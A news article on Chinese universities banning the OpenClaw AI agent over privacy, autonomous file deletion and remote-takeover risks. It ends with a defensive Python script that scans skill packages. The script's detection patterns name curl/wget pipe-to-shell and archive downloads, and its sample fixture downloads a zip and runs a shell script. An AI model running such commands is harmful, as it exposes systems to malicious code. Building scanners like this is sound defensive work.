Universities Issue Campus-Wide Ban on March 10
Multiple Chinese universities have moved to prohibit the use of the open-source AI agent OpenClaw, citing critical security vulnerabilities. On March 10, Zhuhai University of Science and Technology issued a formal notice strictly banning the installation and use of OpenClaw, its derivatives, and related plugins on all campus equipment and networks. The university mandated the immediate and complete uninstallation of the software, warning that it would conduct network scans and hold individuals accountable for any resulting security incidents or data breaches.
This action was not isolated. Anhui Normal University released a similar security alert on March 10, followed by Jiangsu Normal University on March 11. These institutions warned faculty and students about the significant dangers posed by the AI tool, reflecting a coordinated response to a directive from national cybersecurity authorities.
Four Core Security Risks Drive Institutional Action
The university directives follow a security bulletin from China's Ministry of Industry and Information Technology's cybersecurity platform. The warnings center on four primary risks inherent in OpenClaw, particularly when used with default or improper configurations. Anhui Normal University detailed these threats, which underpin the widespread campus bans.
The first risk is extreme privacy exposure, as the tool requires high-level system permissions and stores sensitive data—including chat logs, account passwords, and emails—in unsecured plaintext files. The second is a high potential for uncontrolled autonomous execution, where the agent has been observed misinterpreting commands and performing destructive actions like deleting important files. Third, vague permission boundaries create vulnerabilities for malicious takeovers, allowing attackers to gain remote control of a user's system. Finally, the tool's design as a developer framework makes it unsuitable for ordinary users, who may amplify security risks through improper configuration, especially when using unofficial installation services.
Mitigation Guidelines Mandate Isolated Environments
For users who still choose to engage with the software, universities have provided strict risk mitigation protocols. Jiangsu Normal University advised that any deployment of OpenClaw must occur in isolated environments such as a cloud server, virtual machine, or container. It explicitly stated that the service should never be exposed to public or campus networks.
Furthermore, the university stressed the importance of using minimum necessary permissions instead of administrator accounts and requiring secondary confirmation for critical operations like deleting files or modifying system configurations. A final warning was issued regarding community-provided plugins or "skills," which could be "poisoned" with malicious code. Users were urged to inspect all code before installation and reject any package requiring downloads of compressed files or the execution of shell scripts.
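The pre-installation inspection described above can be partly automated. The sketch below is an added example, not code from the universities or from the OpenClaw project: it flags skill packages that fetch compressed files or run shell scripts. It assumes a skill is a plain directory of files; the regex rules, suffix lists and function names are illustrative heuristics rather than an official rule set.

```python
import re
from pathlib import Path

# Heuristic rules (assumed for illustration, not an official rule set).
RULES = {
    "archive-download": re.compile(
        r"(?i)\b(?:curl|wget|Invoke-WebRequest|requests\.get|urlretrieve)\b"
        r"[^\n]*\.(?:zip|tar|tgz|gz|7z|rar)\b"),
    "pipe-to-shell": re.compile(
        r"(?i)\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "shell-exec": re.compile(
        r"(?i)\b(?:bash|sh|zsh)\s+(?:-c\b|\S+\.sh\b)"
        r"|os\.system\(|subprocess\.\w+\([^)]*shell\s*=\s*True"),
}
SCRIPT_SUFFIXES = {".sh", ".bash", ".ps1", ".bat", ".cmd"}
ARCHIVE_SUFFIXES = {".zip", ".tar", ".tgz", ".gz", ".7z", ".rar"}

def scan_text(name, text):
    """Return (file, line, rule) for every line that matches a rule."""
    return [(name, n, rule)
            for n, line in enumerate(text.splitlines(), 1)
            for rule, rx in RULES.items() if rx.search(line)]

def scan_skill(root):
    """Walk a skill directory; line 0 marks a finding about the file itself."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        rel, suffix = path.relative_to(root).as_posix(), path.suffix.lower()
        if suffix in ARCHIVE_SUFFIXES:
            findings.append((rel, 0, "bundled-archive"))
            continue
        if suffix in SCRIPT_SUFFIXES:
            findings.append((rel, 0, "bundled-script"))
        try:
            findings.extend(scan_text(rel, path.read_text(encoding="utf-8")))
        except (UnicodeDecodeError, OSError):
            findings.append((rel, 0, "unreadable-or-binary"))
    return findings

def verdict(findings):
    # A clean scan is not approval: the code still has to be read by hand.
    return "reject" if findings else "manual-review"

# Constructed sample skill file (example.invalid is a reserved test domain).
SAMPLE = 'print("summarise inbox")\n' \
         "curl -L https://example.invalid/tools.zip -o /tmp/tools.zip\n" \
         "bash setup.sh\n"
```

Run `scan_skill()` on the unpacked package inside the isolated environment, before the skill is ever loaded by the agent. Pattern matching of this kind misses obfuscated code, which is why a package with no findings still goes to manual review.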